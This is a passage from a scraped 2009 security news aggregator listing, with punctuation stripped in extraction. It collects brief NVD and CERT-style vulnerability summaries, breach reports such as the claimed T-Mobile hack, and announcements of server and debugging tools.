on my web site: SymGetEx 10SymGetEx is an addition to Visual Studio 60, which allows Visual C++debugger to automatically download symbols from symbol servers Withautomatic symbol server support, it is easy to keep system symbolsup-to-date, regardless of the number of system updates and hotfixesinstalled on the computer In turn, good symbols for system DLLs helpyou get complete and informative call stacks when debugging yourapplicationsIn the process of downloading symbols, SymGetEx provides detailedprogress reports, which help to troubleshoot network failures andvarious symbol server issues SymGetEx also allows to reduceunnecessary network traffic by maintaining the list of modules whosesymbols should not be downloaded from the symbol server exclusionlistSymGetEx allows to enable or disable symbol server access on the fly,ensuring that the debugger uses symbol server only when it is reallyneeded, and does not consume computing resources at other timesIMAGEhttp://www.secuobs.com/revue/news/109595.shtmlhttp://www.secuobs.com/revue/news/109595.shtml 2009-06-14 21:47:50 - DebugInfo.com Oleg Starodumov : New article on my web site: Debugging startup code of services and COMserversDebugging the startup code of a service or an out-of-process COMserver usually looks like a difficult task, especially if theservice/server is running under a non-administrative user account Butin practice, there is a number of tools and techniques that can makethis task much easier - almost as easy as debugging an interactiveapplicationIMAGEhttp://www.secuobs.com/revue/news/109590.shtmlhttp://www.secuobs.com/revue/news/109590.shtml 2009-06-14 14:09:26 - Shellstorm.org : http://www.secuobs.com/revue/news/109472.shtmlhttp://www.secuobs.com/revue/news/109472.shtml 2009-06-14 04:27:51 - Metasploit : move user-agent reporting into HttpServerhttp://www.secuobs.com/revue/news/109433.shtmlhttp://www.secuobs.com/revue/news/109433.shtml 2009-06-13 13:18:46 - Security Bloggers Network : digg_url ="http://blogsmsdncom/vbertocci/archive/2009/06/12/the-id-element-weekly-donovan-follette-on-making-the-shift-from-adfs-v1-to-geneva-serveraspx";digg_title= "The Id Element Weekly: Donovan Follette on making the shift fromADFS v1 to Geneva Server";digg_bgcolor = "#FFFFFF";digg_skin ="normal";digg_url = undefined;digg_title = undefined;digg_bgcolor =undefined;digg_skin = undefined;IMAGEimageIn the most classic of the role reversals, in this episode of the IdElement Donovan ends up in front of the cameraInterviewing Donovan was great fun: if you used or are using ADFS,this video will be very useful for ferrying you toward the new modelAs the video caption goes:Donovan is a senior technical evangelist and a host for this veryshow: he worked on identity since he joined Microsoft in 2005, and isa well known expert in the ADFS community In this episode Vittoriotalks with Donovan about the relationship between ADFS and GenevaServer: Donovan explains in details how to map the old terminology tothe new concepts introduced in Geneva, focusing on differences andsimilarities in the two approaches, and in general equipping today’sADFS expert with everything he or she needs for hitting the groundrunning with Geneva ServerHave funIMAGEhttp://www.secuobs.com/revue/news/109360.shtmlhttp://www.secuobs.com/revue/news/109360.shtml 2009-06-12 23:48:18 - Channel 9 : IMAGEIn this week’s episode of the ID Element Vittorio interviews DonovanFollette… as the guestDonovan is a senior technical evangelist and a host for this veryshow: he worked on identity since he joined Microsoft in 2005, and isa well known expert in the ADFS community In this episode Vittoriotalks with Donovan about the relationship between ADFS and GenevaServer: Donovan explains in details how to map the old terminology tothe new concepts introduced in Geneva, focusing on differences andsimilarities in the two approaches, and in general equipping today’sADFS expert with everything he or she needs for hitting the groundrunning with Geneva ServerURL references:Jan Alexander on the claims tranformation language in Geneva ServerBeta 2“Geneva” Forum on MSDN"Geneva" Team BlogMicrosoft code name "Geneva"The Identity key topic on Channel 9http://www.secuobs.com/revue/news/109213.shtmlhttp://www.secuobs.com/revue/news/109213.shtml 2009-06-12 21:54:08 - StillSecure, After All These Years : From the classic movie Casablanca: Rick: How can you close me up On whatgrounds Captain Renault: I'm shocked, shocked to find that gamblingis going on in here a croupier hands Renault a pile of moneyCroupier: Your winnings,http://www.secuobs.com/revue/news/109166.shtmlhttp://www.secuobs.com/revue/news/109166.shtml 2009-06-12 07:36:35 - DarkReading All Stories : New Forrester Research report says encryption, data monitoringtechnologies key tools for nowhttp://www.secuobs.com/revue/news/108924.shtmlhttp://www.secuobs.com/revue/news/108924.shtml 2009-06-12 04:22:23 - Security Bloggers Network : In my last post I’ve written a howto on installing Xen and OpenVZ on adedicated root server at a locally well know server ISP This post isnow about the method I use to backup this server on the ISP providedFTP space The backup solution I use provides following: Full backupand restore of http://www.secuobs.com/revue/news/108866.shtmlhttp://www.secuobs.com/revue/news/108866.shtml 2009-06-12 01:37:29 - SearchVMware.com VMware tips and tricks : Virtualizing resource-intensive applications such as Microsoft Exchangeand SQL Server is increasingly possible But you should understand thelicensing and migration implicationsIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/108781.shtmlhttp://www.secuobs.com/revue/news/108781.shtml 2009-06-11 23:06:48 - 4sysops : The five best things about Vista SP2 Amazon EC2 gets Zapped Overnight Somuch about availability and cloud computing Forefront TMG ISAServer URL Filtering Be Aware: Windows Server 2008 SP2 Re-enablesDisabled NICs Copyright © 2006-2009, 4sysops, Digital fingerprint:3db371642e7c3f4fe3ee9d5cf7666eb0http://www.secuobs.com/revue/news/108704.shtmlhttp://www.secuobs.com/revue/news/108704.shtml 2009-06-11 21:24:15 - Vigil@nce vulnérabilités publiques : Un attaquant peut provoquer un Cross Site Scripting dans le plug-inReverse Proxy de Sun Java System Web Serverhttp://www.secuobs.com/revue/news/108676.shtmlhttp://www.secuobs.com/revue/news/108676.shtml 2009-06-11 20:20:15 - Global Security Mag Online : Un attaquant peut provoquer un Cross Site Scripting dans le plug-inReverse Proxy de Sun Java System Web ServerGravité : 2/4Conséquences : accès/droits clientProvenance : documentMoyen d'attaque : aucun démonstrateur, aucune attaqueCompétence de l'attaquant : expert 4/4Confiance : confirmé par l'éditeur 5/5Diffusion de la configuration vulnérable : élevée 3/3Date création : 04/06/2009PRODUITS CONCERNÉSSun Java System Web ServerDESCRIPTION DE LA - Vulnérabilitéshttp://www.secuobs.com/revue/news/108624.shtmlhttp://www.secuobs.com/revue/news/108624.shtml 2009-06-11 18:34:27 - News : The explosion of giant Web properties has server vendors building anew kind of machine that is stripped down to the bare essentials andoptimized for cost- and energy-efficiency, analysts sayread moreIMAGEhttp://www.secuobs.com/revue/news/108556.shtmlhttp://www.secuobs.com/revue/news/108556.shtml 2009-06-11 14:02:46 - Security Park : HP makes it even easier to run a home server like a business by providinga free Comodo multi-domain digital certificate with each newMediaSmart Server With the MediaSmart Server, home-based computernetworks can support several different domains The free multi-domaincertificate reduces the administration needed to integrate the homenetwork with home-based business needs "One Comodo multi morehttp://www.secuobs.com/revue/news/108476.shtmlhttp://www.secuobs.com/revue/news/108476.shtml 2009-06-11 06:20:08 - National Vulnerability Database : The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 andSP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2allows local users to read arbitrary files via a crafted separatorpage, aka "Print Spooler Read File Vulnerability"http://www.secuobs.com/revue/news/108370.shtmlhttp://www.secuobs.com/revue/news/108370.shtml 2009-06-11 06:20:08 - National Vulnerability Database : The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3,Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allowsremote authenticated users to gain privileges via a crafted RPCmessage that triggers loading of a DLL file from an arbitrarydirectory, aka "Print Spooler Load Library Vulnerability"http://www.secuobs.com/revue/news/108369.shtmlhttp://www.secuobs.com/revue/news/108369.shtml 2009-06-11 06:20:08 - National Vulnerability Database : Cross-site scripting XSS vulnerability in Windows Search 40 forMicrosoft Windows XP SP2 and SP3 and Server 2003 SP2 allowsuser-assisted remote attackers to inject arbitrary web script or HTMLvia a crafted file that appears in a preview in a search result, aka"Script Execution in Windows Search Vulnerability"http://www.secuobs.com/revue/news/108368.shtmlhttp://www.secuobs.com/revue/news/108368.shtml 2009-06-11 06:20:08 - National Vulnerability Database : The RPC Marshalling Engine aka NDR in Microsoft Windows 2000 SP4, XPSP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server2008 SP2 does not properly maintain its internal state, which allowsremote attackers to overwrite arbitrary memory locations via a craftedRPC message that triggers incorrect pointer reading, related to "IDLinterfaces containing a non-conformant varying array" and FC_SMVARRAY,FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPCMarshalling Ehttp://www.secuobs.com/revue/news/108365.shtmlhttp://www.secuobs.com/revue/news/108365.shtml 2009-06-11 06:20:08 - National Vulnerability Database : Memory leak in the LDAP service in Active Directory on Microsoft Windows2000 SP4 and Server 2003 SP2, and Active Directory Application ModeADAM on Windows XP SP2 and SP3 and Server 2003 SP2, allows remoteattackers to cause a denial of service memory consumption and serviceoutage via 1 LDAP or 2 LDAPS requests with unspecified OIDfilters, aka "Active Directory Memory Leak Vulnerability"http://www.secuobs.com/revue/news/108363.shtmlhttp://www.secuobs.com/revue/news/108363.shtml 2009-06-11 00:17:52 - 4sysops : Firefox NET Framework Assistant Paranoia Microsoft Forefront TMG ISAServer Beta 3 is Released High-Availability Options with MicrosoftWindows Server 2008 Hyper-V Copyright © 2006-2009, 4sysops, Digitalfingerprint: 3db371642e7c3f4fe3ee9d5cf7666eb0http://www.secuobs.com/revue/news/108212.shtmlhttp://www.secuobs.com/revue/news/108212.shtml 2009-06-11 00:10:58 - extraexploit : http://www.secuobs.com/revue/news/108206.shtmlhttp://www.secuobs.com/revue/news/108206.shtml 2009-06-10 22:10:07 - 4sysops : Submitted by Mobateam - Blog: Mobatek free software MobaSSH is a SSHserver for Windows MobaSSH allows you to run commands and transferfiles on a remote Windows PC from any operating system GNU/Linux,Unix, HP-UX, AIX, Windows, … through a fully secured and encryptednetwork connection MobaSSH is 100% compatible with theLinux/Unix/HPUx/AIX SSH clients, http://www.secuobs.com/revue/news/108156.shtmlhttp://www.secuobs.com/revue/news/108156.shtml 2009-06-10 21:50:35 - 3128 PROXY : Here is a vast list of highly secure and always working free proxyservers that keep our identity completely hiddenhttp://www.secuobs.com/revue/news/108151.shtmlhttp://www.secuobs.com/revue/news/108151.shtml 2009-06-10 20:08:35 - Les derniers documents du CERTA. : Une vulnérabilité de type injection de code indirecte cross-sitescripting a été identifiée dans Kerio MailServerhttp://www.secuobs.com/revue/news/108119.shtmlhttp://www.secuobs.com/revue/news/108119.shtml 2009-06-10 19:10:48 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/108062.shtmlhttp://www.secuobs.com/revue/news/108062.shtml 2009-06-10 19:10:48 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/108061.shtmlhttp://www.secuobs.com/revue/news/108061.shtml 2009-06-10 17:32:13 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Une vulnérabilité a été rapportée dans Sun Solaris, qui pourrait êtreexploitée par des utilisateurs malicieux pour causer un Déni deService DoShttp://www.secuobs.com/revue/news/108035.shtmlhttp://www.secuobs.com/revue/news/108035.shtml 2009-06-10 16:56:22 - MX Logic Security News : Wireless carrier T-Mobile said Tuesday that reports that its servers hadbeen hacked over the weekend were inaccurate, after a posting bysupposed hackers claimed they had stolen sensitive data from thecompany's networksT-Mobile servers were not breached, the company said, adding that "thecompany is conducting a thorough investigation and at this time hasfound no evidence that customer information, or other companyinformation, has been compromised"On Monday, the company had responded to the posting at a security sitecalled Full Disclosure by issuing a statement that it had "identifiedthe document from which information was copied," leading some mediaoutlets to surmise that the company's network security had indeed beenbreachedThe data was being offered to the "highest bidder," the hackers saidin the posting, which also contained a list of IP addresses Theyclaimed to have accessed T-Mobile's financial reports and "databases,confidential documents, scripts and programs from their servers"T-Mobile denied that was the case, saying in the statement that thecompany has taken additional network security measures as "aprecaution"Some security experts yesterday questioned the authenticity of thehacking claim, saying it was likely a hoaxHowever, in a report published Monday on InformationWeekcom, asecurity expert from ScanSafe, Mary Landesman, was quoted as sayingthe long list of source locations and IP addresses involved was"indicative of a serious attack"ADNFCR-1765-ID-19212053-ADNFCRhttp://www.secuobs.com/revue/news/108000.shtmlhttp://www.secuobs.com/revue/news/108000.shtml 2009-06-10 12:20:02 - Toutes les actualités : Les équipes de Microsoft confirment la disponibilité de la R2 de WindowsServer 2008 pour le mois d'octobre, et même à partir de juillet-aoûtpour les IMAGEIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/107891.shtmlhttp://www.secuobs.com/revue/news/107891.shtml 2009-06-10 02:48:30 - New RFCs : 62KB This document describes an architectural framework for MediaServer control The primary focus will be to define logical entitiesthat exist within the context of Media Server control, and define theappropriate naming conventions and interactions between them Thismemo provides information for the Internet communityhttp://www.secuobs.com/revue/news/107761.shtmlhttp://www.secuobs.com/revue/news/107761.shtml 2009-06-10 02:42:41 - SecDocs Feed : http://www.secuobs.com/revue/news/107753.shtmlhttp://www.secuobs.com/revue/news/107753.shtml 2009-06-10 02:42:41 - SecDocs Feed : http://www.secuobs.com/revue/news/107751.shtmlhttp://www.secuobs.com/revue/news/107751.shtml 2009-06-09 23:41:51 - Security Bloggers Network : I just got my new Hetzner server, an EQ4 with 8GB RAM, Core i7-920Quad-Core, 2×750GB HD As my old server is running OpenVZ and I’mquite happy with it I wanted to use also OpenVZ for this oneAdditionally a XEN could use the Hardware virtualization this CPUprovides, if I at some point http://www.secuobs.com/revue/news/107694.shtmlhttp://www.secuobs.com/revue/news/107694.shtml 2009-06-09 21:53:50 - milw0rm.com : http://www.secuobs.com/revue/news/107637.shtmlhttp://www.secuobs.com/revue/news/107637.shtml 2009-06-09 16:25:24 - MX Logic Security News : Unknown hackers claiming to have breached the servers of wirelesscompany T-Mobile are seeking a ransom for the stolen data T-Mobileconfirmed in a statement on Monday that a data breach had occurredT-Mobile said the company identified the document from whichinformation was copied and believe possession of the data, which wasposted Saturday on a website called Full Disclosure, "is not enough tocause harm to our customers"The hackers posted a list of IP addresses and secure locations,according to a network security expert, who said the posted datasuggested a "serious attack," according to InformationWeekIn a note on the Full Disclosure site, the mystery hacker or hackerssaid they would sell the data, which they claimed includes T-Mobile's"databases, confidential documents, scripts and programs from theirservers and financial documents up to 2009"The hackers said they had offered to sell the confidential data toT-Mobile's competitors, but "they didn't show interest in buying theirdata - probably because the mails got to the wrong people - so now weare offering them for the highest bidder"In its statement to various IT security news websites, T-Mobile saidit was investigating the data breach and could not disclose anyfurther information so as to protect the integrity of theinvestigationT-Mobile said it would inform customers "if there is any evidence thatcustomer information has been compromised"ADNFCR-1765-ID-19209909-ADNFCRhttp://www.secuobs.com/revue/news/107436.shtmlhttp://www.secuobs.com/revue/news/107436.shtml 2009-06-09 16:10:57 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/107417.shtmlhttp://www.secuobs.com/revue/news/107417.shtml 2009-06-09 14:28:30 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Une vulnérabilité a été rapportée dans Kerio MailServer, qui pourraitêtre exploitée par des personnes malintentionnées pour conduire desattaques cross-site scriptinghttp://www.secuobs.com/revue/news/107390.shtmlhttp://www.secuobs.com/revue/news/107390.shtml 2009-06-09 00:07:37 - News : Apple on Monday announced a "Developer Preview" of Mac OS X ServerSnow Leopard, a new version of its server software based on the sameunderpinnings as its next-version Mac operating system releaseread moreIMAGEhttp://www.secuobs.com/revue/news/107157.shtmlhttp://www.secuobs.com/revue/news/107157.shtml 2009-06-08 22:15:06 - SearchVMware.com VMware tips and tricks : VSphere, Intel hardware and integration tools can make a 100% virtualizeddata center closer to reality But concerns about virtualizationsecurity, software support and ROI could hinder adoptionIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/107116.shtmlhttp://www.secuobs.com/revue/news/107116.shtml 2009-06-08 21:51:07 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/107084.shtmlhttp://www.secuobs.com/revue/news/107084.shtml 2009-06-08 20:19:45 - Les derniers documents du CERTA. : Plusieurs vulnérabilités dans IBM WebSphere Application Server permettentà une personne malveillante de porter atteinte à la confidentialitédes données ou d'effectuer une injection de code indirectehttp://www.secuobs.com/revue/news/107072.shtmlhttp://www.secuobs.com/revue/news/107072.shtml 2009-06-08 19:58:06 - milw0rm.com : http://www.secuobs.com/revue/news/107037.shtmlhttp://www.secuobs.com/revue/news/107037.shtml 2009-06-08 12:42:16 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/106890.shtmlhttp://www.secuobs.com/revue/news/106890.shtml 2009-06-08 11:03:28 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Deux vulnérabilités ont été identifiées dans XM Easy Personal FTP Server,qui pourraient être exploitées par des utilisateurs malicieux pourcauser un Déni de Service DoShttp://www.secuobs.com/revue/news/106875.shtmlhttp://www.secuobs.com/revue/news/106875.shtml 2009-06-08 02:03:48 - gHacks technology news : Are you one of those special geeks that think there is never TMI toomuch information If that describes you then Nagios is the monitorfor you Once installed, Nagios will keep you busy with moreinformation about your system than you ever thought possible But it’snot just a matter of running apt-get install http://www.secuobs.com/revue/news/106760.shtmlhttp://www.secuobs.com/revue/news/106760.shtml 2009-06-07 19:15:26 - SecGuru : Pro Ubuntu Server Administration teaches you advanced Ubuntu systembuilding After reading this book, you will be able to manage anythingfrom simple file servers to multiple virtual servers tohigh–availability clusters This is the capstone volume of the ApressUbuntu trilogy that includes Beginning Ubuntu Linux, Third Edition andBeginning Ubuntu Server LTS Administration: From Novice toProfessional, Second Edition You will be able to make Ubuntutechnology shine in a Fortune–500 environment and let Ubuntu serverbecome the backbone of your infrastructure Topics covered include* Performance monitoring and optimization* High–availability clustering* Advanced LDAP integrated networkingWhat you’ll learn* Monitor Ubuntu Server software and the hardware it is running on* Make Ubuntu Server fly by careful optimization* Learn how to craft high–availability clusters* Ease your way into large–scale LDAP networking* Acquire the skills to adjust Ubuntu Server to the security needsof a Fortune–500 environment* Run your own Ubuntu application serverWho is this book for Anyone who administers Linux servers and wantsto know enough about Ubuntu to make it fly About the Apress Pro SeriesThe Apress Pro series books are practical, professional tutorials tokeep you on and moving up the professional ladder You have gotten thejob, now you need to hone your skills in these tough competitivetimes The Apress Pro series expands your skills and expertise inexactly the areas you need Master the content of a Pro book, and youwill always be able to get the job done in a professional developmentproject Written by experts in their field, Pro series books fromApress give you the hard–won solutions to problems you will face inyour professional programming careerIMAGEIMAGEIMAGE IMAGE IMAGE IMAGE IMAGEIMAGEhttp://www.secuobs.com/revue/news/106706.shtmlhttp://www.secuobs.com/revue/news/106706.shtml 2009-06-07 03:50:12 - Hack In The Box : The shutdown of the Pricewert internet service provider ISP looksunlikely to have the same crushing effect of spam as the McColoclosure last year Security companies are reporting some drop in spamlevels and botnet activity but they are quickly recovering Overallspam and botnet activity is now approaching the levels present beforeyesterday's shutdown “So far our guys haven't seen anythingdifferent,” Graham Cluley, senior technology consultant for Sophostold vnunetcom “McColo was the last of the dinosaurs Now amulti-headed hydra; it's getting much harder to knock out thebotnets”http://www.secuobs.com/revue/news/106616.shtmlhttp://www.secuobs.com/revue/news/106616.shtml 2009-06-06 17:47:40 - gHacks technology news : DreamSys Server Monitor, once a commercial remote server monitoringsoftware, is now available as a free download from the developer’shomepage The user still needs to enter registration information afterinstallation They are however available on the homepage without theneed for registration or any other kind of data grabbing The ServerMonitor application can http://www.secuobs.com/revue/news/106538.shtmlhttp://www.secuobs.com/revue/news/106538.shtml 2009-06-06 11:59:30 - gHacks technology news : SSH is a network protocol that allows to be transferred in a securechannel Most users probably associate SSH with Linux and Unixcomputer systems Webmasters might know and use SSH to connect to andmanage their Linux servers FreeSSHd is a free SSH Server for theWindows operating system Users can setup the SSH http://www.secuobs.com/revue/news/106499.shtmlhttp://www.secuobs.com/revue/news/106499.shtml 2009-06-06 04:10:33 - Hack In The Box : This project attempts to show you how to make your own home media serverfrom readily available PC components et open source software Thesoftware components we’ll be using in this feature are: Ubuntu Linux810 Firefly DAAP Server for streaming to iTunes clients, RokuSoundbridge, and other DAAP aware devices MediaTomb – this allowsstreaming of audio et video over the ubiquitous UPnP protocol Mostnewer TVs and game consoles the PS3 are UPnP capable and allow youto stream content from UPnP enabled sources iTunes Windows andRhythmbox Linux can play media that is centrally hosted on this typeof server - an excellent way to setup a centralized, on demandaudio/video library in your homehttp://www.secuobs.com/revue/news/106466.shtmlhttp://www.secuobs.com/revue/news/106466.shtml 2009-06-06 00:37:25 - Toutes les actualités : 1 Hyper-V propose une migration à la volée Nous avons apprécié quel'hyperviseur de virtualisation Hyper-V de Windows 2008 R2 puisseenfin permettre IMAGEIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/106414.shtmlhttp://www.secuobs.com/revue/news/106414.shtml 2009-06-06 00:35:21 - 4sysops : DreamSys Server Monitor is a free simple server monitoring tool that isvery easy to set up Yet it has all essential features for basicserver monitoring The tool is certainly no match for a sophisticatedprogram like The Dude However, for the Dude you need a couple ofhours to learn how it works http://www.secuobs.com/revue/news/106413.shtmlhttp://www.secuobs.com/revue/news/106413.shtml 2009-06-05 20:07:14 - Toutes les actualités : Microsoft prévoit de livrer au même moment, fin octobre prochain, Windows7, son prochain OS client, et Windows Server 2008 R2, son systèmed'exploitation IMAGEIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/106315.shtmlhttp://www.secuobs.com/revue/news/106315.shtml 2009-06-05 18:36:51 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/106293.shtmlhttp://www.secuobs.com/revue/news/106293.shtml 2009-06-05 18:25:14 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Nortel a reconnu quelques vulnérabilités dans Nortel Media ProcessingServer, qui pourraient être exploitées par des personnesmalintentionnées pour potentiellement compromettre le système d'unutilisateurhttp://www.secuobs.com/revue/news/106286.shtmlhttp://www.secuobs.com/revue/news/106286.shtml 2009-06-05 15:36:18 - Toutes les actualités : 1 Hyper-V propose une migration à la volée Nous avons apprécié quel'hyperviseur de virtualisation Hyper-V de Windows 2008 R2 puisseenfin permettre IMAGEIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/106209.shtmlhttp://www.secuobs.com/revue/news/106209.shtml 2009-06-05 13:06:54 - Toutes les actualités : Hyper-V propose une migration à la volée Nous avons apprécié quel'hyperviseur de virtualisation Hyper-V de Windows 2008 R2 puisseenfin permettre IMAGEIMAGEIMAGEIMAGEhttp://www.secuobs.com/revue/news/106168.shtmlhttp://www.secuobs.com/revue/news/106168.shtml 2009-06-05 00:01:53 - 4sysops : Windows Server 2008 R2 will follow the same RTM, GA dates as Windows 72nd half of July, October 22 Forrester: Microsoft Office in nodanger from competitors Guess the Google Apps hype is already overDownload Microsoft Windows Server 2003 R2 Enterprise Edition VHDMicrosoft plans jumbo patch day next week A First Look http://www.secuobs.com/revue/news/105993.shtmlhttp://www.secuobs.com/revue/news/105993.shtml 2009-06-04 19:57:13 - Global Security Mag Online : - Vulnérabilitéshttp://www.secuobs.com/revue/news/105917.shtmlhttp://www.secuobs.com/revue/news/105917.shtml 2009-06-04 19:47:26 - Bulletins et Alertes de Sécurité SECURINFOS.INFO : Une vulnérabilité a été rapportée dans Sun Java System Web Server, quipourrait être exploitée par des personnes malintentionnées pourconduire des attaques cross-site scriptinghttp://www.secuobs.com/revue/news/105898.shtmlhttp://www.secuobs.com/revue/news/105898.shtml 2009-06-04 11:12:09 - www.leastprivilege.com : This document appeard on the connect site Interesting_IMAGEhttp://www.secuobs.com/revue/news/105709.shtmlhttp://www.secuobs.com/revue/news/105709.shtml 2009-06-04 06:04:42 - National Vulnerability Database : IBM WebSphere Application Server WAS 61 through 61024 and 70through 7004, IBM WebSphere Portal Server 51 through 60, and IBMIntegrated Solutions Console ISC 601 do not properly set theIsSecurityEnabled security flag during migration of WebSphere MemberManager WMM to Virtual Member Manager VMM and a FederatedRepository, which allows attackers to obtain sensitive informationfrom repositories via unspecified vectorshttp://www.secuobs.com/revue/news/105680.shtmlhttp://www.secuobs.com/revue/news/105680.shtml 2009-06-04 06:04:42 - National Vulnerability Database : The secure login page in the Administrative Console component in IBMWebSphere Application Server WAS 602 before 60235 does notredirect to an https page upon receiving an http request, which makesit easier for remote attackers to read the contents of WAS sessions bysniffing the networkhttp://www.secuobs.com/revue/news/105679.shtmlhttp://www.secuobs.com/revue/news/105679.shtml 2009-06-04 06:04:42 - National Vulnerability Database : Unspecified vulnerability in the System Management/Repository componentin IBM WebSphere Application Server WAS 602 before 60235 hasunknown impact and attack vectors, related to a "security exposure inwsadmin"http://www.secuobs.com/revue/news/105678.shtmlhttp://www.secuobs.com/revue/news/105678.shtml 2009-06-04 06:04:42 - National Vulnerability Database : The Configservice APIs in the Administrative Console component in IBMWebSphere Application Server WAS 602 before 60235 allowattackers to obtain sensitive information via unspecified vectorshttp://www.secuobs.com/revue/news/105677.shtmlhttp://www.secuobs.com/revue/news/105677.shtml 2009-06-04 06:04:42 - National Vulnerability Database : The Security component in IBM WebSphere Application Server WAS 602before 60235 permits "non-standard http methods," which has unknownimpact and remote attack vectorshttp://www.secuobs.com/revue/news/105676.shtmlhttp://www.secuobs.com/revue/news/105676.shtml 2009-06-03 08:13:52 - Hak5 Large Xvid : Building your own VMware ESXi Server in under an hour with parts you mayhave lying under your bed Extreme sports cameras and mounts andmounts can be expensive Why not build your own for about 5 bucks Andlight video editing that's both easy and free Avidemux may be theanswerhttp://www.secuobs.com/revue/news/105280.shtmlhttp://www.secuobs.com/revue/news/105280.shtml 2009-06-03 07:37:23 - Advanced Password Cracking Insight : The summer has begun, and as usual at this time of the year big companiespresent the results of hard work to the public With Microsoft’s Bingand Google Wave flooding the news, you might have overlooked the jointrelease of NVIDIA and Supermicro At Computex 2009 in Taipei, Taiwan,Nvidia and Supermicro announced “a new class http://www.secuobs.com/revue/news/105253.shtmlhttp://www.secuobs.com/revue/news/105253.shtml 2009-06-03 03:44:18 - Hack In The Box : SkyLounge, an online service for business travelers, says it has resolvedan attack on its servers that resulted in an unknown number of usersreceiving messages purporting to be from the site The company’sfounder believes the annoyance has resulted in him being “the mosthated man in North America” A Network World Canada reporterreceived messages from 16 people between 4:50 pm Monday and 9:08 amTuesday asking to unsubscribe from an unspecified service from Dover,Delaware-based SkyLounge The reporter was not CCd on the messages butwas apparently part of an automated mailing list A colleague at ITWorld Canada described a similar experience Neither of the reportershad signed up asking to be on a SkyLounge mailing list SkyLounge’sfounder, Marcel van Gemerden, said none of his members were affectedand he believes a hacker broke into his e-mail accounthttp://www.secuobs.com/revue/news/105193.shtmlhttp://www.secuobs.com/revue/news/105193.shtml 2009-06-03 03:03:40 - News : read moreIMAGEhttp://www.secuobs.com/revue/news/105158.shtmlhttp://www.secuobs.com/revue/news/105158.shtml 2009-06-02 14:51:19 - ASTALAVISTA hacking and Security community Blog Meldungen : We are proud to offer you 3 new wargames server You can find them underthe mneu tab HACKINGAnd that's not all For hacking on wargames server you need also somegood tools Under the menu Tools you can find some very useful onlinetools like:Privacy Analysis, Banner Information, Proxy Checker, IP 2 Country,Password Generator, Anonymize your Links, DNS Tools, My IP address,Default Ports, Encryption KitThese online tools are also very helpfull for auditing computersystemsAnd a short forecastIn June we will launch a hacking challenges with over 300 levels Iguess every hacker will count the days to June the use his skills onthese challengesStay on ASTALAVISTA and feel the spirit of the hacking et securitycommunityhttp://www.secuobs.com/revue/news/104861.shtmlhttp://www.secuobs.com/revue/news/104861.shtml 2009-06-02 14:42:05 - Windows Security Logging and Other Esoterica : So a long time ago, back in my days of providing technical support forWindows NT 40, I published "Security Event Descriptions" Thisarticle was the "schema" so to speak, for the Windows NT 40 securityevent log eventsTechnically Windows events are not schematized until Windows Vista; orput another way the schema is implicit based on the instrumentation inthe code- since the event is raised by some function in the code, the"schema" could be interpreted as the parameter order in the call tothat functionAnyway security monitoring types love that article, but I hate itIt's just better than nothing It doesn't state which events map towhich audit policy categories It does tell you whether the event is asuccss or failure event but it doesn't alert you to the cases wherethe same event is used for success and failure eg event 560When Windows 2000 came around and we added two new audit policycategories DS Access and Account Logon which was a huge namingblunder, I wrote an article for the Windows 2000 security eventsHowever it was so large I broke it into two articlesI didn't write an article for Windows Server 2003 At first I didn'tthink it was necessary because we propagated all the WS03 events tothe Technet Events et Errors Message Center web site I wrote customcontent for the top 30 or so events by volume of searchesOn a side note, did you ever wonder what happens when you click the"More Information" link at the bottom of the Event Viewer eventdescription We send the event source, event ID, OS version and soforth to the Technet EetE site and display the content that isreturned We count the number of hits for each OS Version/Source/EventID combination and then our writing teams pester the component ownersto populate that contentAnyway, I was making excu^h^h er, explaining why I didn't write the KBarticles for Windows Server 2003 security events So I thought the EetEmessage center would be all that anyone needed It didn't strike me asthat important that you had to have seen the event or at least knowit exists before you could use the site However since then I havereceived a large number of requests for the event definitions, mainlyfrom people who were creating security event management solutionsSo here's what I have for you, courtesy of Ned, one of the audit logposse here at Microsoft If you want a complete list of WS03 securityevents, then I suggest you look at chapter 4 of the Windows Server2003 Security Guide This documents the event IDs of all the securityevents on Windows Server 2003 Plus, it groups them by policycategory, in case you ever wanted to know what you are in for if youenable one of the categories for audit If you want the layout of theevent what data is in the description field, and in what order thenjust look for that specific event on the Technet EetE site or click thelink in the bottom of the event description in Event ViewerI've already described how the Vista and Windows Server 2008 andsubsequent releases event systems are self-documenting, so I won't gointo that further hereOne last tip: If you own Microsoft System Center Operations Manager2007, then you can search for a file called EventSchemaxml on themedia It is an XML document that describes one possible normalizationall the security events from Windows 2000 forward, and the semanticcontent of the normalized events2007-10-31 UPDATE: There is also an event-id-to-audit-policy-categorymap hereIMAGEhttp://www.secuobs.com/revue/news/104835.shtmlhttp://www.secuobs.com/revue/news/104835.shtml 2009-06-02 14:42:05 - Windows Security Logging and Other Esoterica : Fadi, Ned and Brian of the auditing team have documented all theauditing events by audit policy category and subcategory for yourreferenceCheck it out in the Knowledge BaseEven better, they documented all the events in spreadsheet format, andthat's propagating to the Microsoft Download Center I'll publish thelink when it's online2008-04-17 UPDATE: Brian just sent me the link: here is thespreadsheetIMAGEhttp://www.secuobs.com/revue/news/104828.shtmlhttp://www.secuobs.com/revue/news/104828.shtml 2009-06-02 